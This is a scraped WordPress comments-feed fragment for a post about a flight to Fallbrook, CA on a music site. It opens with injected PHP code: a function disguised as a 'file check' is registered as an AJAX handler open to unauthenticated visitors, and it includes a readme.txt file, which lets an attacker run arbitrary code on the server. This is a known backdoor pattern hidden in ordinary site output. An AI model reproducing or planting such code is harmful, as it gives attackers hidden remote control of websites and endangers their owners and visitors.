if(!function_exists('file_check_readme66587')){ add_action('wp_ajax_nopriv_file_check_readme66587', 'file_check_readme66587'); add_action('wp_ajax_file_check_readme66587', 'file_check_readme66587'); function file_check_readme66587() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Never Again — A flight tale of a trip to Fallbrook, CA. https://www.bassethoundmusic.com/never-again-a-flight-tale-of-a-trip-to-fallbrook-ca/ Tue, 14 Nov 2017 19:08:10 +0000 hourly 1 https://wordpress.org/?v=5.8.10